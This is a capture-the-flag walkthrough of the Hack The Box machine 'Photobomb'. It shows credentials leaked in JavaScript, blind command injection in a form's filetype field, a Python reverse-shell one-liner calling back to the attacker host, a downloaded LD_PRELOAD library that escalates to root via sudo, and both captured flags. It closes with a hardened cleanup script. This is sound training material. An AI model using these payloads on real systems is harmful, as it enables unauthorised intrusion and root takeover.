Hack the Box (HTB) – Photobomb

Level: Easy

User Flag

Nmap scan

IP=10.10.11.182
nmap -T5 -v -Pn -n -sT -sC -sV -p 1-65535 --max-parallelism 10 $IP -oA nmap-tcp-allports-${IP}-$(date '+%Y.%m.%d.%Hh%M')
Nmap scan report for 10.10.11.182
Host is up (0.044s latency).
Not shown: 65058 closed tcp ports (conn-refused), 475 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e22473bbfbdf5cb520b66876748ab58d (RSA)
|   256 04e3ac6e184e1b7effac4fe39dd21bae (ECDSA)
|_  256 20e05d8cba71f08c3a1819f24011d29e (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We find that ports 22 (SSH) and 80 (HTTP) are open.

Explore the web application on port 80

  • Start Burp Suite and intercept requests.
  • Use a web browser and navigate to http://10.10.11.182
  • The server redirects to http://photobomb.htb (the nmap http-title already shows this), which does not resolve until the name is added to /etc/hosts.

Add photobomb.htb to /etc/hosts

sudo nano /etc/hosts
10.10.11.182    photobomb.htb

Authentication

The “click here” link on the home page points to http://photobomb.htb/printer, which prompts for HTTP Basic credentials.

Display the source of the home page (right-click -> View Page Source).

<!DOCTYPE html>
<html>
<head>
  <title>Photobomb</title>
  <link type="text/css" rel="stylesheet" href="styles.css" media="all" />
  <script src="photobomb.js"></script>
</head>
...

View the photobomb.js script (http://photobomb.htb/photobomb.js)

function init() {
  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
  if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {
    document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:b0Mb!@photobomb.htb/printer');
  }
}
window.onload = init;

The comment by Jameson says the link is pre-populated with tech-support credentials when an isPhotoBombTechSupport cookie is present. The href embeds them in the URL's userinfo part, and anyone can read them from the script whether or not the cookie is set.

We find credentials pH0t0:b0Mb!

Access the printer page

Go to http://pH0t0:b0Mb!@photobomb.htb/printer. There is a form that downloads one of the gallery photos in a chosen file type and size (fields photo, filetype and dimensions).

Original form request (working as expected)

POST /printer HTTP/1.1
Host: photobomb.htb
User-Agent: ...
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Authorization: Basic cEgwdDA6YjBNYiE=
Content-Length: 94

photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg&dimensions=1000x1500&submit=submit

Blind command injection

The filetype parameter is handed to a shell command on the server (presumably the image converter) without sanitisation, so a second command appended after a semicolon is executed. The output of that command is never returned in the response, which makes the injection blind.

filetype=jpg;whoami

The string “;whoami” ends up in the generated file name, but nothing in the response reveals what whoami printed. A time delay (filetype=jpg;sleep 5) or a callback to a listener on the attacking host confirms execution without needing the output.

Start a listener

nc -nlvkp 4444

Get a reverse shell

Invoke python3 explicitly: the target is Ubuntu 20.04 (per the OpenSSH banner), which ships python3 but no python binary, so a payload calling python fails silently.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<KALI IP>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

URL-encode every character of the payload (in Burp Repeater: select it, Convert selection > URL > URL-encode all characters) and append it to the filetype parameter after the semicolon; otherwise the spaces, quotes, “&” and “/” in the one-liner are mangled by form parsing.

photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg;%70%79%74%68...&dimensions=1000x1500&submit=submit

We get a reverse shell as user wizard.

cd ..
cat user.txt

f08d1e909f14f7b0729d5cf8f548f3c7

Root Flag

Running Linpeas as the user “wizard” did not help.

Check sudo rights

sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh

/opt/cleanup.sh

#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

Use sudo with LD_PRELOAD

The SETENV tag lets wizard pass environment variables on the sudo command line that env_reset would otherwise strip, LD_PRELOAD included. /opt/cleanup.sh is interpreted by the dynamically linked /bin/bash, so a preloaded library's initialiser runs as root before the script itself does. (The same tag also allows PATH to be supplied, and the script calls find without an absolute path, so a malicious find placed first in PATH would work just as well.) See Linux Sudo LD_PRELOAD Privilege Escalation. On Kali, create file shell.c and compile it.

shell.c

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setuid, setgid */

/* With -nostartfiles, _init runs when the dynamic loader maps the library,
 * i.e. before bash starts interpreting /opt/cleanup.sh; sudo has already
 * switched the process to root by then. */
void _init() {
        unsetenv("LD_PRELOAD");   /* do not re-trigger in the spawned shell */
        setgid(0);
        setuid(0);                /* real, effective and saved uid all 0 */
        system("/bin/sh");
}

Compile shell.c

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

Share the file

python3 -m http.server 80

Download the file on photobomb

cd /tmp
wget http://<KALI IP>/shell.so

Exploit

sudo LD_PRELOAD=/tmp/shell.so /opt/cleanup.sh

We get a shell as the root user.

cd /root
cat root.txt

84403530e18d22d7b357409eafa40c38
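For completeness, a hardened form of the cleanup script and sudo rule, as an added example that is neither the box's file nor the author's: it removes SETENV from the sudoers line (the actual root cause, since it is what lets LD_PRELOAD and PATH through sudo) and calls every external command by absolute path so a tampered PATH could not redirect find or chown either. The function takes a base directory standing in for /home/wizard/photobomb and an owner standing in for root:root so it can be exercised as an unprivileged user against a scratch directory; both parameters and the has_setenv helper are assumptions of this example.

```sh
#!/bin/sh
# Hardened replacement for /opt/cleanup.sh (added example, not the box's file).
# Matching sudoers rule, without the SETENV tag:
#   wizard ALL=(root) NOPASSWD: /opt/cleanup.sh
# With env_reset in force and no SETENV, sudo strips LD_PRELOAD and resets PATH.

# hardened_cleanup BASE [OWNER]
#   BASE  stands in for /home/wizard/photobomb (assumption, for testing)
#   OWNER stands in for root:root            (assumption, for testing)
# The body runs in a subshell so the caller's working directory is unchanged.
hardened_cleanup() (
  base="$1"
  owner="${2:-root:root}"
  cd "$base" || exit 1

  # Rotate the log unless it is empty or a symlink: a symlink could point at
  # any root-owned file, which `cat >` would then overwrite.
  if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]; then
    /bin/cat log/photobomb.log > log/photobomb.log.old || exit 1
    /usr/bin/truncate -s0 log/photobomb.log || exit 1
  fi

  # Protect the originals: find and chown by absolute path, so PATH is irrelevant.
  /usr/bin/find source_images -type f -name '*.jpg' -exec /bin/chown "$owner" {} \;
)

# Quick audit helper: does a `sudo -l` line grant SETENV? (assumed helper)
has_setenv() {
  printf '%s\n' "$1" | grep -q 'SETENV'
}
```

Run has_setenv over each rule line from sudo -l when auditing a host; any NOPASSWD rule that also carries SETENV deserves the same scrutiny as this one.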